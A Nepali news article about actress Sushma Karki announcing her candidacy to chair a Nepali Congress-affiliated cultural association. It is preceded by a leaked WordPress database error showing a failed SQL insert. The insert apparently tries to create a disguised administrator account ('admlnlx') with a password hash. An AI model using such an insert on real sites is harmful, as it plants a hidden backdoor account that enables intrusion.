WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BgtbAm1Gcyjz.YFYJXRkPcMIeAbpax1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 03:46:26', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ २२ –
नेपाली काँग्रेसको शुभेच्छुक संगठन नेपाल साँस्कृतिक संघको दोस्रो महाधिवेशनको सभापति पदको लागि नायिका सुष्मा कार्कीले उम्मेदारी घोषणा गरेकि छन्।
बुधबार रिपोर्टर्स क्लब नेपालमा पत्रकार सम्मेलन गरेर नायिका कार्कीले सभापति पदको लागि आफ्नो उम्मेद्धारी घोषणा गरेकी हुन्।
दोस्रो महाधिवेशनको माहोल तातिरहेको बेला सभापतिको लागि बर्तमान अध्यक्ष तिर्थ थापा, देउडा गायक नन्दकृष्ण जोशी लगायतको नाम चलिरहेको बेला नायिका कार्कीले सभापतिमा आफ्नो उम्मेद्धारी रहने बताएकी हुन्।
नेपाली काँग्रेस पार्टीले लोकतन्त्रको नाममा सर्वसम्मत रुपमा नेतृत्व चयन गर्ने कुरा चलिरहेको बेला यस्तो अलोकतान्त्रिक काम गरेको भन्दै कार्कीले पार्टीका शिर्ष नेताको खरो बिरोध गरेकी छन्।
नेपाल साँस्कृतिक संघ लावारिसे रुपमा रहेको र स्थापनाको १४ बर्षसम्म पनि कार्यलय खडागर्न नसकेको अवस्थामा आफु सभापति भएपछि पहिलो काम संगठनलाई पार्टीको भातृ संगठनको रुपमा बिकासगर्ने र त्यस पछि प्रत्येक जिल्लामा साँस्कृतिक संघको स्थितिलाई बुझेर व्यबस्थित गर्ने विश्वास व्यक्त गरिन्।
हरेकको ओठमा गीत र हरकको पैतलामा नाच हुन्छ भन्ने सत्यलाई अंगालेकी कार्की विगत लामो समयदेखि काँगेसका हरेक कार्यक्रममा भाग लिने र साथ सहयोग गर्ने कार्यकर्ताको अब्बल सुचिमा पर्छिन्।